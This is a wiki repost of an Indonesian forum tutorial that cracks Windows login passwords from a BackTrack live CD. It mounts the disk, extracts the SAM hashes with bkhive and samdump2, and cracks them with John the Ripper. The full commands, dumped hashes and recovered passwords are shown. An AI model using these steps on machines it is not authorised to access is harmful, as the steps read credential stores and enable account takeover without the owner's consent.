Backtrack: Cracking Password Windows

From SpeedyWiki

Jump to: navigation, search

Sumber:

Contents

[edit] Langkah Singkat

  • Mount file system Windows misalnya
mkdir /mnt/sda1
mount /dev/sda1 /mnt/sda1
  • File yang diperlukan di Windows
/mnt/sda1/windows/system32/config/sam
/mnt/sda1/windows/system32/config/system
  • Lakukan SAMdump
samdump2 /mnt/sda1/windows/system32/config/system /mnt/sda1/windows/system32/config/sam
  • Pipe ke file
samdump2 /mnt/sda1/windows/system32/config/system /mnt/sda1/windows/system32/config/sam > whash.txt
  • Proses akhir dengan John The Ripper
/pentest/passwords/jtr/john /root/whash.txt
cat /pentest/passwords/jtr/john.pot
/pentest/passwords/jtr/john --show /root/whash.txt


[edit] Artikel Original

original post by: ~vinblack~
at Komunitas Backtrack Indonesia Forum Index » Tutorial, Tips, dan Trick Backtrack
follow this link for disscussion board

http://indobacktrack.or.id/forum/viewtopic.php?t=720

Meskipun gwe seorang newbie, tapi itu gak akan menghilangkan semangat gwe untuk membuat sebuah tutorial yang bisa di share buat teman-temin semua, terlepas dari banyak kekurangan disana sini ane mohon maaf yeh , hehehe… pertama-tama sebelum memulai gwe mau tutup dulu video miyabi unscensored gwe neh…, huahahhaa…, becanda fren…….., kamsud gwe gwe selipin dulu sebatang rokok dan menyeruput kopi panas yg maknyus tenan….., wokeh langsung aja dah tanpa memperpanjang mukadimah alias preface….

untuk kali ini kita akan mencoba cracking password windows via backtrack 4 live CD (kamsudnya dengan booting melalui CD backtrack 4), sebetulnya tutorial ini pernah di buat oleh ncang assadotcom di JS dengan menggunakan BT 2 kalo gak salah, tapi untuk kali ini ane coba di BT 4 prefinal.

1.Pertama setting di bios anda booting dari CD

2.Kemudian masuk ke BT seperti biasa dengan perintah startx

3.kita lanjut ke tahap mengkases file windows via BT, kenapa kita mengakses data windows, yah terang aja kan kita mau ngecrack passwordnya yg terletak di direktori C://WINDOWS/system32/config/ SAM , file yg bernama SAM inilah tempat di mana windows menyembunyikan password login windows. Wokeh lalu masuk di bt console dan ikuti langkah berikut:

untuk mengakses file window dan mounting di BT

root@backtrackers:~# mountconfig

maka akan muncul tampilan Disk & FileSystem Configuration, selanjutnya di situ kita bisa lihat bahwa drive C: windows terletak di partisi 1, atau kita bisa analisa satu persatu kok. Klik di partisi tersebut lalu klik new untuk merubah mountingnya. Lalu configurasi sbb:

Type: Automatic
Mount Point: /mnt/sda1 (kalo belum ada folder sda1 nya silahkan di buat yah)
Device: /dev/sda1/

pastikan posisinya udah enable alias warna ijo……

selanjutnya lakukan mounting dengan perintah:

root@backtrackers:~# mount /dev/sda1 /mnt/sda1

maka drive window sudah bisa kita akses di bt lalu lihat secara detail file windowsnya, bisa juga kita lihat di explorer nya bt dimana letak file SAM nya.

root@backtrackers:~# ls -l /mnt/sda1/WINDOWS/system32/config/SAM
-rwxrwxrwx 1 root root 262144 2009-11-10 00:17  /mnt/sda1/WINDOWS/system32/config/SAM

untuk selanjutnya windows menyembunyikan sistem proteksi file SAM nya di file yg bernama syskey yang terletak di direktori berikut:

root@backtrackers:~# ls -l /mnt/sda1/WINDOWS/system32/config
total 31916
-rwxrwxrwx 1 root root 6029312 2009-11-11 01:23 system

(karena terlalu banyak untuk di tampilkan, jadi gwe capture aja file target kita, yaitu system)

okey kita udah dapet yg namanya file system, dan untuk selanjutnya kita akan capture file syskey tersebut dan kita jadikan sebuah file dengan program yg namanya bkhive yang terletak di :

aplikasi > backtrak > privilege escalation > password attack > offline attack > bkhive

atau langsung ketik di console juga gpp, gak dosa kok ), disini nama file output yg gwe buat adalah wsyskey (buat penamaan terserah lo pada deh, mau bikin asiacarerasyskey atau tukul_syskey juga ga jadi masalah ) )


root@backtrackers:~# bkhive /mnt/sda1/WINDOWS/system32/config/system wsyskey
bkhive 1.1.1 by Objectif Securite

http://www.objectif-securite.ch

original author: ncuomo@studenti.unina.it

Root Key : $$$PROTO.HIV
Default ControlSet: 001
Bootkey: 0c7b80c915ccc01cd4e949af7ebdde90

okey kita udah berhasil membuat file syskeynya, bisa di liat kok (gwe simpern filenya di /root)

root@backtrackers:~# ls -l
-rw-r--r-- 1 root root 16 2009-11-10 23:01 wsyskey

selanjutnya untuk melihat file yg terenkripsi didalam file system kita gunakan program samdump2 aplikasi > backtrak > privilege escalation > password attack > offline attack > samdump2

so yang artinya, jadi.., masukin perintah begono noh……, sehingga muncullah beberapa login yg ada di windows yg udah kita dump dari file sam

root@backtrackers:~# samdump2 /mnt/sda1/WINDOWS/system32/config/SAM wsyskey
samdump2 1.1.1 by Objectif Securite

http://www.objectif-securite.ch

original author: ncuomo@studenti.unina.it

Root Key : SAM
Administrator:500:545a8bd6333a94aff4227b3697fb5b7c:71dd6e54afa0b12d34f6aadb93a02564:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4977de14abb666c164f9f2ff61b57ac6:2932ca40988c78b801d226c8140b6702:::
juliaperes:1002:aad3b435b51404eeaad3b435b51404ee:ce899a3735c9489ffdc2c48df3ed6fdd:::
vinblackganteng:1003:85fcfffed6e0e9fcb75e0c8d76954a50:b33902ac5aacd0a02af58e900fa594a5:::

sekanjutnya…., eh sori.., selanjutnya kamsudnya….., kita rubah file wsyskey tadi menjadi file hash dalam ekstensi .txt , selanjutnya filenya ane kasih nama whash.txt

root@backtrackers:~# samdump2 /mnt/sda1/WINDOWS/system32/config/SAM wsyskey > whash.txt
samdump2 1.1.1 by Objectif Securite

http://www.objectif-securite.ch 

original author: ncuomo@studenti.unina.it

R oot Key : SAM

lalu liat kembali apa file tersebut udah jadi apa belon…..

root@backtrackers:~# ls -l
total 162944
-rw-r--r-- 1 root root 431 2009-11-10 23:05 whash.txt

nah lo udah ngonol…eh nongol dia…… ) , lalu liat isinya dengan perintah cat


root@backtrackers:~# cat whash.txt
Administrator:500:545a8bd6333a94aff4227b3697fb5b7c:71dd6e54afa0b12d34f6aadb93a02564:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4977de14abb666c164f9f2ff61b57ac6:2932ca40988c78b801d226c8140b6702:::
juliaperes:1002:aad3b435b51404eeaad3b435b51404ee:ce899a3735c9489ffdc2c48df3ed6fdd:::
vinblackganteng:1003:85fcfffed6e0e9fcb75e0c8d76954a50:b33902ac5aacd0a02af58e900fa594a5:::

nah udah nongol lagi dah.., file2 user login dengan enkripsi hash nya, dan untuk selanjutnya kita akan crack file hash tersebut dengan program di bt4 prefinal yg namanya john (bukan john banting yah ,, hehehe) yang ada di aplikasi > backtrak > privilege escalation > password attack > offline attack > john

root@backtrackers:/pentest/passwords/jtr# ./john /root/whash.txt

sehingga si bang john akan mengcrack file hash yg ada di file whash.txt tersebut yang kemudian menampilkan password windows tersebut, dalam proses crackingnya program ini seolah2 seperti hang, padahal dia sedang melakukan bruteforce terhadap file tersebut sehingga jika kita tidak akan menunggu lebih lama kita tekan aja control c untuk men setop prosesnya.

Karena bang john tidak bisa membedakan huruf besar kecil dan besar maka kita lihat file yg di simpen bang john di direktori dia sendiri yaitu

root@backtrackers:~# cat /pentest/passwords/jtr/john.pot
$1$xd5xuJYT$x6un0Ho.gXVCv4ZduhsYQ.:toor
$LM$aad3b435b51404ee:
$LM$f4227b3697fb5b7c:SEKSI
$LM$b75e0c8d76954a50:GANTENG123

dan yang terkahir setelah kita lihat di direktori bang john kembali kita tampilkan file pamungkas dengan perintah cat

root@backtrackers:/pentest/passwords/jtr# ./john --show /root/whash.txt

maka terlihatlah password untuk
vinblackganteng: ganteng123
juliaperes: SEKSI

NB: 1. untuk proses crackingnya terkadang penggunaan password yg panjang dan multikarakter sepertinya bang john cukup kesulitan atau memakan waktu lama (perasaan ane sih, mungkin ada temen2 laen yg punya teknik sendiri atau solusi, yang jelas file hash nya udah kita dapetin) 2. dalam proses cracking ini bang john tidak akan mengulangi lagi terhadap file yang udah di cracknya, jadi walaupun kita mengulanginya sampai 10 kali, si john tetap pada pendiriannya yaitu cracking yg pertama.

Sekian dulu tutorial yang acak2an ini , semoga membantu dan ada teman2 lain yg komen untuk proses yg lebih baik. go…go…go backtrackers…….. , nonton miyabi lagi ahhhhhh…. tutorial ini dibuat dalam waktu yg sesingkat-singkatnya di tengah pergolakan antara KPK, POLRI & KEJAKSAAN =))

Thakns to: s’to & assadotcom @JS (di sini juga ada dia deh) , seluruh member indobacktrack



[edit] Referensi

[edit] Pranala Menarik

Personal tools